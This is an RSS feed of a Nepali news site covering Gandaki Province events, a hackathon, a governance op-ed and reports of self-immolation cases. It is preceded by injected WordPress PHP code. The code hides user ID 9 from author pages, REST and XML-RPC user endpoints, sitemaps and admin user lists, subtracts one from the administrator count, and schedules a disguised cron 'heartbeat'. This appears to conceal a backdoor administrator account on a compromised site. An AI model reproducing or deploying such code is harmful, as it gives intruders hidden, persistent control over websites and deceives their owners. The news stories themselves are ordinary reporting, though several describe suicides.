add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
विविध – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
News from Gandaki ProvinceSat, 25 Jul 2026 07:12:15 +0000en-US
hourly
1 https://wordpress.org/?v=7.0.2https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpgविविध – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
3232लघु जीवन बीमा र सहकारी सम्बन्धमा सहकारीका पदाधिकारी तथा कर्मचारीहरू बीच अन्तरक्रिया
https://www.antaranganews.com/?p=50256
https://www.antaranganews.com/?p=50256#respondFri, 24 Jul 2026 13:32:59 +0000https://www.antaranganews.com/?p=50256सुन्दरबजार(लमजुङ)– लमजुङमा ‘लघु जीवन बीमा र बचत तथा ऋण सहकारीबीच बीमाको महत्व’ विषयक अन्तरक्रिया कार्यक्रम भएको छ । उहाँ स्थित हाम्रो बचत तथा ऋण सहकारी संस्था लि.को आफ्नै हलमा उक्त कार्यक्रम साउन ८ गते सम्पन्न भएको हो ।
संस्थाका अध्यक्ष विकास श्रेष्ठको अध्यक्षतामा सम्पन्न कार्यक्रममा लिबर्टी माइक्रो लाइफ इन्स्योरेन्स लिमिटेडका गण्डकी–लुम्बिनी प्रदेश प्रमुख शिवप्रसाद पौडेल प्रमुख अतिथि हुनु हुनुहुन्थ्यो ।
प्रमुख अतिथि पौडेलले जीवन बीमा तथा लघु जीवन बीमाको आवश्यकता, महत्व, दाबी भुक्तानी प्रक्रिया, जोखिम व्यवस्थापन तथा परिवारको आर्थिक सुरक्षामा बीमाले खेल्ने भूमिकाबारे जानकारी गराउनुभयो । उहाँले बीमा भविष्यका अनिश्चित जोखिमबाट परिवारलाई सुरक्षित राख्ने भरपर्दो माध्यम भएको बताउनुभयो ।
त्यसैगरी सुन्दरबजार चेम्बर अफ कमर्सका अध्यक्ष विष्णु कुमार श्रेष्ठले सहकारी र बीमा एकअर्काका परिपूरक संस्था भएको उल्लेख गर्दै वर्तमान समयमा आर्थिक सुरक्षाका लागि बीमाको महत्व झन् बढ्दै गएको बताउनुभयो। उहाँले सहकारी र बीमा संस्थाबीचको सहकार्यले सदस्यहरूको आर्थिक सुरक्षालाई अझ मजबुत बनाउने विश्वास व्यक्त गर्नुभयो ।
कार्यक्रममा अध्यक्ष विकास श्रेष्ठले लिबर्टी माइक्रो लाइफ इन्स्योरेन्स लिमिटेडले सहकारीका सदस्यहरूको दुर्घटना बीमा र मृत्यु दाबी समयमै भुक्तानी गरी सदस्यहरूको विश्वास जित्न सफल भएको बताउनुभयो । उहाँले समयमै गरिएको दाबी भुक्तानीले सहकारी र बीमा कम्पनीबीचको सम्बन्ध अझ सुदृढ भएको उल्लेख गर्नुभयो ।
कार्यक्रममा संस्थाका पदाधिकारी तथा कर्मचारीहरूको उल्लेखनीय सहभागिता रहेको थियो । सहभागीहरूबीच बीमाको आवश्यकता, दाबी भुक्तानी प्रक्रिया, सहकारीमार्फत बीमा सेवा विस्तार तथा सदस्यहरूको आर्थिक सुरक्षाका विषयमा अन्तरक्रिया गरिएको थियो ।
सहभागीले राखेको जिज्ञासामा लिबर्टी माइक्रो लाइफ इन्स्योरेन्स लिमिटेडका गण्डकी– लुम्बिनी प्रदेश प्रमुख शिवप्रसाद पौडेलले जवाफ दिनु भएको थियो ।
]]>
https://www.antaranganews.com/?feed=rss2&p=502560अचेत हजुरआमाको साथमा पत्रकार पाण्डे पाँच दिनदेखि बेसीशहरमा
https://www.antaranganews.com/?p=50010
https://www.antaranganews.com/?p=50010#respondSun, 12 Jul 2026 13:34:14 +0000https://www.antaranganews.com/?p=50010लमजुङ– प्रेस चौतारीका केन्द्रीय अध्यक्ष पत्रकार गणेश पाण्डे पाँच दिनदेखि जिल्ला सदरमुकाम बेसीशहरमा हु्नुहुन्छ । अचेत हजुरआमाको उपचारका लागि उहाँ पछिल्ला पाँच दिनदेखि असार २८ गतेसम्म यहाँ रहनु भएको हो ।
पत्रकार पाण्डेकी हजुरआमा (मावलतर्फकी) झेलकुमारी सिलवाल विरामी हुनुभएका कारण यहाँ स्थित प्रदेश अस्पताल लमजुङमा भेन्टिलेटरमा राखेर उहाँको उपचार चलिरहेको छ । सिलवाल ८४ वर्षकी हुनुहुन्छ । पछिल्ला १३ वर्षदेखि झेलकुमारी सिलवाल आफ्नी एकमात्र छोरी शान्ताकुमारी पाण्डे तथा नाति एवम् पत्रकार गणेश पाण्डेका साथमा कहिले काठमाडौं, कहिले बेसीशहर गर्दै बस्दै आउनु भएको छ । उहाँको स्थायी बसोबास बेसीशहर नगरपालिका– ११ को कार्कीडाँडा हो । सिलवालकी छोरीतर्फ दुई जना नाति पत्रकार गणेश पाण्डे जेठो र रामचन्द्र पाण्डे कान्छो नाति हुनुहुन्छ ।
आफ्नो गृह जिल्लाबाट पत्रकारितामा प्रवेश गर्नु भई जिल्लामै रहेर त्यो क्षेत्रमा एक खालको उचाई प्राप्त गर्नु भएका पाण्डे सशस्त्र द्वन्द्वकालमा सुरक्षा निकायको तारो बन्नु् भएको थियो । त्यही कारणले उहाँ राजधानी काठमाडौंतर्फ लाग्न बाध्य हुनु भयो । यतिबेला संघीय राजधानीमा रहेर पत्रकारिताका साथमा उहाँले चलचित्र निर्माताका रुपमा समेत आफ्नो परिचय स्थापित गर्न सफल हुनुहुन्छ । पत्रकारितामा यतिबेला एकखालको सफलताको उच्च श्रेणी (प्रेस चौतारीका केन्द्रीय अध्यक्ष) उहाँले हासिल गर्नु भई पत्रकारिताको गरिमा उठाउने कार्यमा सक्रियपूर्वक लागि पर्नु भएको छ । पछिल्ला दिनमा नेपाल सरकारले व्यवहारिक रुपमा अपनाइरहेको ‘सञ्चारमाध्यमप्रति संकुचन गर्ने नीति’प्रति पाण्डेले निकै चिन्ता व्यक्त गर्नु भएको छ ।
झेलकुमारी सिलवालका छोरा पनि एकजना मात्र हुनुहुन्थ्यो– स्व. रामजी सिलवाल । सशस्त्र द्वन्द्वकालमा भूमिगत रहनु भएका उहाँको २०६५ सालमा निधन भएको हो । भूमिगत कालमै विरामी हुनुभएका उहाँलाई शान्ति सम्झौतापछि माओवादी पार्टीले पनि खासै वास्ता गरेन, अन्ततः राम्रो उपचार पाउन नसकेकै कारणले उहाँको निधन हुन गएको थियो । सिलवालका पनि एक छोरा र छोरी तथा श्रीमती हुनुहुन्छ ।
पत्रकार पाण्डेकी हजुरआमा झेलकुमारी लामो समयदेखि मुटुको समस्याबाट पीडित हुनुहुन्थ्यो भने पछिल्ला सातामा उहाँको छातीमा समेत समस्या देखिएको छ । अचेत अवस्थामा उहाँको उपचार यहाँ स्थित प्रदेश अस्पतालमा भेन्टिलेटरमा चलिरहेको छ ।
चुरोटको निकै सौखिन रहनु भएकी झेलकुमारीमा मुटुको समस्या देखिन थाले पछि डा. भगवान कोइरालाको काउन्सिलिङ पाएर उहाँले चुरोट छाड्नु भएको पनि १० वर्ष भइसकेको छ । तर पनि उहाँ बढी ग्रस्त हुनुमा त्यसबेलाको धुमपानको प्रभाव बाँकी हुनु पनि हुन सक्ने देखिएको छ ।
करिब एकसाता यता अचेत अवस्थामै झेलकुमारीले जीवन र मृत्युसँग पैठेजोरी खेलीरहनु भएको छ । ‘सास छउञ्जेल आश’ भनिन्छ तर पनि उपचाररत उहाँको स्वास्थ्यमा चमत्कार भएमात्र सुधार हुने स्थिति रहेको चिकित्सकको भनाइ छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=500100उत्साहवर्द्धक रह्यो ४८ घण्टे राष्ट्रिय ह्याकाथनको पहिलो दिन
https://www.antaranganews.com/?p=50000
https://www.antaranganews.com/?p=50000#respondSun, 12 Jul 2026 01:32:50 +0000https://www.antaranganews.com/?p=50000काठमाडौं– प्रविधिमार्फत नवप्रवर्तन र सिर्जनशीलतालाई प्रोत्साहन गर्ने उद्देश्यले अर्किड इन्टरनेशनल कलेजद्वारा आयोजित ‘Orchid HackX २०२६’ को पहिलो दिन उत्साहपूर्ण वातावरणमा सम्पन्न भएको छ । ४८ घण्टे राष्ट्रिय ह्याकाथनको पहिलो दिन सहभागी टोलीहरूको दर्ता, अभिमुखीकरण तथा परियोजना विकास (Development Phase) को औपचारिक सुरुवात गरिएको कलेजले जनाएको छ ।
देशभरबाट छनोट भएका युवा विद्यार्थी तथा प्रविधिप्रेमीहरू पहिलो दिनदेखि नै नवीन सोचलाई व्यवहारमा उतार्ने तयारीमा जुटेका छन् । सहभागीहरूले एकअर्कासँग विचार आदान–प्रदान गर्दै साइबर सुरक्षा, आर्टिफिसियल इन्टेलिजेन्स (AI), मेसिन लर्निङ (ML), ओपन इनोभेसन तथा सूचना प्रविधिसँग सम्बन्धित विविध समस्याको समाधान विकास गर्न थालेका छन् ।
आयोजकका अनुसार आगामी ४८ घण्टासम्म निरन्तर सञ्चालन हुने ह्याकाथनमा सहभागीहरूले वास्तविक समस्याको समाधान खोज्ने डिजिटल उत्पादन तथा प्रविधिमा आधारित नवीन परियोजनाहरू तयार पार्नेछन् । यस अवधिमा उद्योग, शैक्षिक संस्था तथा प्रविधि समुदायबीच सहकार्य, सिकाइ र अनुसन्धानलाई पनि प्राथमिकता दिइनेछ ।
कलेजले पहिलो दिनको वातावरणलाई अत्यन्त ऊर्जाशील, सिर्जनात्मक र प्रतिस्पर्धात्मक रहेको जनाएको छ । सहभागीहरूको उत्साह र नवीन सोचले नेपालमा नवप्रवर्तनको संस्कृतिलाई थप मजबुत बनाउने विश्वास आयोजकको छ ।
अर्किड इन्टरनेशनल कलेजले सूचना प्रविधि तथा व्यवस्थापनका विभिन्न शैक्षिक कार्यक्रमहरूमा समेत भर्ना खुला रहेको जनाएको छ । कलेजमा B.Tech in Artificial Intelligence (AI), BIT, BSc CSIT, BCA, BITM, BBM, BBA, MBA, BSW tyf BA in Psychology कार्यक्रम सञ्चालन हुँदै आएका छन् ।
कलेजले कृत्रिम बुद्धिमत्ता (AI), डिप लर्निङ, डाटा साइन्स, कम्प्युटर भिजन, साइबर सुरक्षा, सफ्टवेयर इन्जिनियरिङ, इन्टरनेट अफ थिङ्स (IoT), रोबोटिक्स लगायतका अत्याधुनिक प्रविधि क्षेत्रमा दक्ष जनशक्ति उत्पादन गर्ने लक्ष्यका साथ आधुनिक शिक्षण प्रणाली अवलम्बन गर्दै आएको जनाएको छ ।
गौशाला, काठमाडौंस्थित कलेजले इच्छुक विद्यार्थीहरूलाई सम्बन्धित शैक्षिक कार्यक्रमहरूमा समयमै आवेदन दिन आग्रह गरेको छ । HackX २०२६ मार्फत नेपाली युवाहरूलाई राष्ट्रिय तथा अन्तर्राष्ट्रिय स्तरका प्रविधिगत चुनौतीहरूको समाधान विकास गर्न प्रेरित गर्दै नवप्रवर्तनमुखी समाज निर्माणमा योगदान पुग्ने अपेक्षा गरिएको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=500000अन्ततः आत्मदाहको प्रयास गरेका बुद्धनगर निवासी ४५ वर्षीय राउतको निधन
https://www.antaranganews.com/?p=49979
https://www.antaranganews.com/?p=49979#respondSat, 11 Jul 2026 12:35:59 +0000https://www.antaranganews.com/?p=49979काठमाडौं– काठमाडौंको बुद्धनगरमा आज बिहान आत्मदाहको प्रयास गरेका ४५ वर्षीय आश्विन राउतको निधन भएको छ । उपचारका क्रममा अपराह्न उनको निधन भएको वीर अस्पतालका सूचना अधिकारी ताराबहादुर कार्कीले असार २७ गते बताउनु भएको हो ।
आज बिहान करिब ६ः२० बजे उनले आफ्नै कोठामा आत्मदाहको प्रयास गरेको प्रहरी भनाइ छ । उनले आत्मदाहको प्रयास गरेको खबर पाएलगत्तै प्रहरीले उद्धार गरेर वीर अस्पतालमा उपचारका लागि पठाएको थियो ।
आफ्नै घरको भान्सा कोठामा आत्मदाह प्रयास गरेका राउतलाई प्रहरीले तत्काल उद्धार गरी वीर अस्पताल पु¥याएर सघन उपचार कक्ष (आईसीयू) मा उपचाररत रहेकोमा उनको केहीबेर अघि मात्र निधन भएको जिल्ला प्रहरी परिसर काठमाडौंका एसपी पवन भट्टराईले जानकारी दिनु भएको हो । प्रहरीले दिएको जानकारी अनुसार राउतको शरीर ५५ प्रतिशतभन्दा बढी जलेका उनी श्रीमती र छोरासहित बुद्धनगरमा बस्दै आएका थिए ।
यसअघि, काठमाडौंकै त्रिपुरेश्वरस्थित राहदानी विभाग अगाडि आत्मदाहको प्रयास गरेका मुगुका २५ वर्षीय गणेश नेपालीको पनि उपचारकै क्रममा असार २५ गते मुगुका गणेश नेपालीले आत्मदाह गरेका थिए । उनको उपचारका क्रममा हिजो असार २६ गते निधन भएको थियो ।
यसैबीच, हिजैका दिन सर्लाहीमा अर्का एक पुरुष(विवेक मण्डल)ले आत्मदाहको प्रयास गरेका थिए । कीर्तिपुर बर्न अस्पतालमा उनको उपचार भइरहेको प्रहरीले जनाएको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=499790अपाङ्गता भएका व्यक्तिहरूलाई सैलुन सेवामा ५० प्रतिशत छुट सुविधा दिन सहमति
https://www.antaranganews.com/?p=49973
https://www.antaranganews.com/?p=49973#respondSat, 11 Jul 2026 11:30:18 +0000https://www.antaranganews.com/?p=49973बेसीशहर– लमजुङमा अपाङ्गता भएका व्यक्तिहरूलाई यहाँ स्थित एक सैलुनले आफ्नोमा सेवा लिएवापत ५० प्रतिशत छुट सुविधा दिने भएको छ । अपाङ्ग अभियन्ता एवम् अपङ्ग महासंघको पूर्व केन्द्रीय सदस्य चन्द्रकान्त पौडेलको विशेष पहलमा सेवाप्रदाक गोल्डेन युनिसेक्स सैलुनले सो सुविधा दिने सहमति असार २७ गते भएको हो ।
बेसीशहर नगरपालिका– ८ को सेराचोकमा लामो समयदेखि सेवा दिदै आइरहेको गोल्डेन युनि सेक्स सैलुनले अपाङ्गता भएका व्यक्तिहरूलाई त्यस्तो सुविधा दिन राजी भएको हो । आफ्नो पेशाको सामाजिक उत्तरदायित्वपूर्ण सेवाको मनन गर्दै कपाल र दारीका साथै महिलाका पक्षमा पनि उपलब्ध सुबिधा सहित सहुलियत दिने आफू सहमत भएको उक्त सैलुनका प्रोपाइटर आवास हुसेनले बताउनु भयो ।
सो सम्बन्धमा गोल्डेन युनिसेक्स सौलुनका प्रोपाइटर आवास हुसेन र अपाङ संरक्षण समाजका संस्थापक अध्यक्ष समेत रहनु भएका अपाङ्ग अभियन्ता पौडेलका बीचमा सो सहमति भएको हो । यो सहमति तत्कालका लागि एक वर्षका लागि लागू हुने प्रोपाइटर हुसेनले जानकारी दिनु भएको छ ।
सो सहमति पछि अपाङ्ग अभियन्ता पौडेलले गोल्डेन युनि सेक्स सौलुन, त्यसका प्रोपाइटर हुसेन लगायतका सैलुन सञ्चालक परिवारलाई धन्यवाद दिदै सबै अपाङ्गता भएका अपाँ ्क्ष(ा समाजका सदस्य तथा जिल्लाभरमा साथीहरूलाई उक्त सेवाको फाईदा लिन हुन अनुरोध गर्नु भएको छ ।
सो सेवा सुविधा सम्बन्धि सहमति पत्र आदनप्रदान गरेसँगै उक्त अवसरमा अपाङ्गता अभियन्ता एवम् अपाङ्ग संरक्षणका अध्यक्ष चन्द्रकान्त पौडेल र सो संस्थाका सचिव सीताराम बसेलले ५० प्रतिसत छुटको पहिलो सेवा आजै लिनुभएको समेत जानकारीमा आएको छ ।
स्मरणीय छ, उक्त सैलुन बेसीशहरमा एसी सहितको सेवा सुविधा जडित भएको समान शुल्क लिने पहिलो हो ।
]]>https://www.antaranganews.com/?feed=rss2&p=499730अर्का एक पुरुषद्वारा आत्मदाह प्रयास, गम्भिर अवस्थामा उपचारका लागि लगियो बीर अस्पताल
https://www.antaranganews.com/?p=49969
https://www.antaranganews.com/?p=49969#respondSat, 11 Jul 2026 08:38:26 +0000https://www.antaranganews.com/?p=49969काठमाडौं– यहाँ अर्का एक पुरुषद्वारा फरि आत्मदाहको प्रयास भएको छ । काठमाडौंको बुद्धनगर क्षेत्रमा पारिवारिक विवादपछि शरीरमा आगो लगाएर आत्मदाहको प्रयास गरेका हुन् । आगोले पोलेर गम्भिर अवस्थामा रहेका उनको उपचारका लागि बीर अस्पतालमा असार २७ गते लगिएको छ ।
काठमाडौंको त्रिपुरेश्वरमा एक २५ वर्षीय युवाले आत्मदाह प्रयासपछि उनको दुःखद् निधन भएको घाउ निको नहुँदै राजधानीमा फेरि अर्को आत्मदाहको प्रयास भएको खुलासा भएको हो । काठमाडौं महानगरपालिका– १० बुद्धनगरस्थित डेरामा बस्दै आएका ४५ वर्षीय आश्विन राउतले आज बिहान आफ्नै शरीरमा आगो लगाएर आत्मदाहको प्रयास गरेका प्रहरी भनाइ छ ।
उक्त अप्रिय कदमको पछाडि पारिवारिक विवाद कारक देखिएको प्रहरीको प्रारम्भिक अनुसन्धानले देखाएको छ । प्रहरीका अनुसार राउतको केही समयअघि आफ्ना छोरासँग घरायसी विषयमा विवाद भएको खुलेको प्रहरीका प्रवक्ता एसपी पवन भट्टराईले बताउनु भयो । उहाँका अनुसार घरमा श्रीमती र छोरा नभएको मौका छोपेर उनले बिहान सवा ६ बजेतिर भान्सा कोठामा छिरेर आफैँमाथि तेल खन्याई आगो सल्काएको थिए ।
राउत श्रीमती र छोरासँग बुद्धनगरमा बस्दै आएका थिए । तर, घटना घटेको समयमा उनकी श्रीमती र छोरा घरमा नरहेको प्रहरीले जनाएको छ । आत्मदाह प्रयासको स्पष्ट कारण अहिलेसम्म खुल्न सकेको छैन । अघिल्लो दिन राउतको आफ्नै छोरासँग विवाद भएको छिमेकीले बताएको प्रहरी प्रवक्ता भट्टराईले बताउनु भएको छ ।
प्रहरीका अनुसार भान्साबाट आगोको लप्का र धुवाँ निस्किएपछि परिवारका अन्य सदस्य र स्थानीयवासीले थाहा पाएर उनलाई उद्धार गरेका थिए । घटनालगत्तै पुगेको प्रहरी टोलीले स्थानीयको सहयोगमा उनलाई उपचारका लागि वीर अस्पताल पु¥याएको छ ।
आगोबाट गम्भीर घाइते भएका राउतको हाल वीर अस्पतालमा उपचार भइरहेको जिल्ला प्रहरी परिसर काठमाडौंले जनाएको छ । सो कार्यालयका अनुसार राउतको शरीरको ५५ प्रतिशतभन्दा बढी भाग जलेको र अवस्था चिन्ताजनक रहेको छ ।
प्रहरी प्रवक्ता भट्टराईले घटनाबारे थप अनुसन्धान भइरहेको जानकारी दिनु भएको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=499690सुशासनका लागि कृषि अनुदान जस्तै खोज्नै पर्ने अन्य केही निकायबाट गरिएका लगानी
https://www.antaranganews.com/?p=49962
https://www.antaranganews.com/?p=49962#respondSat, 11 Jul 2026 05:55:34 +0000https://www.antaranganews.com/?p=49962लमजुङ– संघीय सरकारले कृषि क्षेत्रमा गरिएको लगानी सदुपयोग वा दुरुपयोग भएको बारेमा कृषकका लागि दिइएको अनुदानको हिसाब खोज्ने राम्रो योजना अघि सारेको छ । यसले मुलुकमा सुशासनका पक्षमा राम्रो काम गर्ने आंकलन गरिएको छ । यो कार्यको निर्क्योल भएसँगै बनाइने नीतिले असली र साना लगानीका किसानका लागि राहत हुनेछ भन्ने आम बुझाई छ ।
त्यसरी नै विगतका सरकारबाट भएका लगानीको खोजीनीति हुनुपर्ने अन्य केही क्षेत्र पनि छन् । जसको राम्रोसँग खोजीनीति हुन जरुरी छ । यदि त्यसो गर्न सकियो भने त्यसले सुशासनका टुल्सलाई राम्रोसँग टेवा दिनेछ भन्ने सरकारका शुभचिन्तकहरूले सुझाएका छन् । ती क्षेत्र हुन् :
जिल्ला विकास समितिबाट जिल्ला समन्वय परिषदमा परिणत हुँदा जिल्ला विकास समिति हुँदाका ताका गरिएका लगानी(२०६२÷६३ र अघि र पछिका) खोज्न जरुरी देखिएको छ । त्यसैगरी गाउँ विकास समितिबाट गाउँपालिकामा परिणत गरिदा गाउँ विकास समिति हुँदा तिनताका त्यहाँबाट विकास योजनाका नाउँमा गरिएका लगानी अर्थात योजना र अनुदान आदिको खर्च रकमको खोजी हुन समेत बाञ्छनीय देखिएको छ ।
यसैगरी, तत्कालीन जिल्ला शिक्षा कार्यालयबाट शिक्षा विकास तथा समन्वय इकाईमा परिणत हुँदा जिल्ला शिक्षा कार्यालयबाट जिल्ला भित्रका विभिन्न विद्यालयका नाउँमा भवन निर्माण (ब्लक) लगायतका कार्यमा दिइएका अनुदान रकमको खोजी गरिनु पर्छ भन्ने सर्वसाधारणको माग छ । तिन ताका दुई र चार कोठे भवनका लागि नेपाल सरकारबाट दिइने अनुदान रकम जिल्ला शिक्षा कार्यालयबाट दिइने प्रचलन थियो । त्यो रकम कतिपय विद्यालयमा ती भवनको जगसम्म नहाली केवल कागजमा मात्र बनेको भन्ने देखाई ती विद्यालयका प्रधानाध्यापकहरू र त्यो बेलामा जिल्ला शिक्षा कार्यालयका प्रमुखले झ्याम परेका गुनासाहरू समेत आइरहेका छन् ।
त्यसैले त्यस्तो योजनाका बजेटसमेत खोजीनीति हुन जरुरी रहेको सर्वसाधारणको गुनासो र संघीय सरकारसँग माग रहेको छ । त्यसैले यसतर्फ संघीय सरकारको ध्यान जान जरुरी देखिएको छ ।
त्यस्तै, २०६२/६३ को आन्दोलन पछि बनेको सरकारले गाउँ गाउँमा खोलिएका सहकारीका लागि वितरण गरेको प्रति सहकारी एक लाख रुपैयाँ पनि एकाध सहकारीमा बाहेक सदुवयोग भएको भन्ने सुनिदैन । त्यसैले त्यो रकमसमेत खोज्न जरुरी देखिएको सर्वसाधारणले बताउने गरेका छन् ।
]]>https://www.antaranganews.com/?feed=rss2&p=499620गणेश नेपाली आत्मदाह प्रकरण : ह्विल लक ट्राफिक नभइ, नगर प्रहरीले लगाएको हो– रोष्ट्रममै भावुक गृहमन्त्री गुरूङ
https://www.antaranganews.com/?p=49959
https://www.antaranganews.com/?p=49959#respondSat, 11 Jul 2026 03:41:05 +0000https://www.antaranganews.com/?p=49959काठमाडौं– मुगुका २५ बर्षीय गणेश नेपाली आत्मदाह प्रकरणका नयाँ नयाँ घट्नाक्रमको उजागर भइरहेको छ । प्रतिनिधिसभामा सांसदहरूले राखेको प्रश्नमा जबाफ दिँदै गृहमन्त्री सुधन गुरूङले नेपालीले आत्मदाह गरेको घटनामा उनको मोटरसाइकलमा ह्विल लक लगाउने काम ट्राफिक प्रहरी नभई नगर प्रहरीबाट भएको असार २६ गते बताउनु भएको छ ।
गणेश नेपालीले गरेको आत्मदाहको विषयले संसद् बैठक स्तब्ध भएको थियो । बोल्ने सबैजसो सांसदले नेपालीप्रति श्रद्धाञ्जली व्यक्त गरे । नेपाली कांग्रेसका सांसद चन्द्रमोहन यादवले त एक मिनेट मौनधारण गर्नु भयो ।
सांसदहरूले राखेको प्रश्नमा जबाफ दिने क्रममा गृहमन्त्री सुधन गुरूङले भन्नुभयो, ‘जुन ठाउँमा घटना भयो, त्यो ठाउँमा ट्राफिकले ह्विल लक लगाएको होइन । कुनै भिडिओमा छ ट्राफिकले लगाएको ? नगर प्रहरीले लगाएको छ ।’ ‘यतिबेला स्थानीय सरकार कसको छ अहिले ? रास्वपाको छ ? प्रदेश सरकार कसको छ ? दुई तहको सरकार त तपाईंहरूसँग छ । यो नियम कानुन हामीले बनाएको हो ?’ विपक्षीहरूको प्रश्नमा गृहमन्त्रीको प्रतिप्रश्न गर्नु भएको थियो ।
उहाँले गणेशले आत्मदाह गरेको घटनामा छानबिन गर्न समिति गठन गरेको सदनलाई जानकारी दिनु भयो । उहाँका अनुसार काठमाडौं उपत्यका प्रहरी कार्यालय रानीपोखरीका डिआइजी गोविन्द थपलियाको संयोजकत्वमा ५ सदस्यीय समिति बनाइएको छ ।
घटनाको अनुसन्धान गर्न तीन जना नगर प्रहरीलाई नियन्त्रणमा लिइएका दुई जना महिला नगर प्रहरी र एक जना पुरूष नगर प्रहरी छन् ।
त्यसो त नेपालीको आत्महत्याको विषयलाई हेर्ने नजर सांसदहरूका फरक–फरक थिए । विपक्षी दलका सांसदहरूले गणेश नेपालीको दैनिकी, युवापन र गरिबीसँग जोडेर सरकारप्रति प्रश्न उठाए । सत्तापक्षले मानसिक स्वास्थ्यको विषय उठाएका थिए ।
सबैको सार नेपालमा युवाले भविष्य देख्न सक्नुपर्छ, नेपालकै रोजगारीका अवसर पाउनुपर्छ भन्ने थियो । तर राज्यले लिने ट्राफिक जरिवानाको विषयमा दुवैथरी तर्क आए ।
नेकपा एमालेकी सांसद भूमिका लिम्बु सुब्बाले सरकारले अत्याधिक ट्राफिक जरिवानाका कारणले समेत गणेश नेपालीले आत्मदाह गरेको र यसको जिम्मेवारी सरकारले लिनुपर्ने उल्लेख गर्नुभयो ।
नेपाली कांग्रेसकी प्रमुख सचेतक वासना थापाले २०७९ साल माघ १० गते प्रेम आचार्यले नयाँ बानेश्वरस्थित संसद् भवन अगाडि गरेको आत्मदाह उदाहरण त्योबेला वर्तमान प्रधानमन्त्री बालेन शाह काठमाडौं महानगरपालिकाका मेयर छदा बालेनले आचार्यको आत्मदाहमा राज्यको नीति जोडिएको भनेर स्टाटस लेखेको स्मरण गराउनुभयो ।
नेपाली कम्युनिष्ट पार्टीका नेता वर्षमान पुनले त्यसबेलाको बालेन शाहको स्टाटस पढेरै सुनाउनु भएको थियो ।
त्यो बेला बालेनको प्रतिक्रिया थियो, ‘एकजना नागरिक आफूले देखेको प्रगतिको चाहनाका लागि सक्ने सबै कर्म गर्छन् । एकजना नागरिक आफूले चिनेको वा जानेको सबैलाई आफ्नो विगत र आगत वर्णन गरेर आत्महत्या गर्न लागेको खबर गर्छन् । एकजना नागरिक संसद भवनको अगाडि आफुमाथि पेट्रोल खन्याएर निराशा पोख्छन् । त्यो निराशाका कारण र धेरै संकेतहरु होलान् तर सबै भन्दा ठुलो कारण राज्य हो । र, सबै भन्दा भयानक संकेत राज्यको चरम असफलताको हो ।’ यो बुझाइमा अहिले पनि हो वा फेरियो ? भन्दै नेता पुनले प्रधानमन्त्रीलाई प्रश्न गर्नु भएको थियो ।
राष्ट्रिय स्वतन्त्र पार्टीकी सांसद आशिका तामाङले मानसिक तनावका कारण गणेश नेपालीले आफ्नो शरिरमा पेट्रोल खन्याएर आत्महत्या गर्न प्रयास गरेको’ बताउनु भयो । गृहमन्त्री गुरूङको ‘क्वीक रेसपोन्स’ रोष्ट्रममै भावुक :
२५ वर्षीय एक युवाले आत्मदाह गरेको र यो विषयमा संसद्मा उठेको प्रश्नमा तत्कालै जवाफ दिन गृहमन्त्री सुधन गुरुङ तयार हुनुभयो । सभामुख डोलप्रसाद अर्यालसँग समय मागेर घटनाको विवरण, सरकारले गरेको प्रयास र सरकारको प्राथमिकता प्रष्ट्याउनु भएको थियो । सांसदहरूले सो घट्नामा सरकारसँग जवाफदेहीता खोजेर गरेका प्रश्नमा भने मन्त्रीले प्रतिप्रश्न गर्नुभयो । तर गृहमन्त्री सुधन गुरूङ संसदको रोष्ट्रममै भावुक बन्नुभयो ।
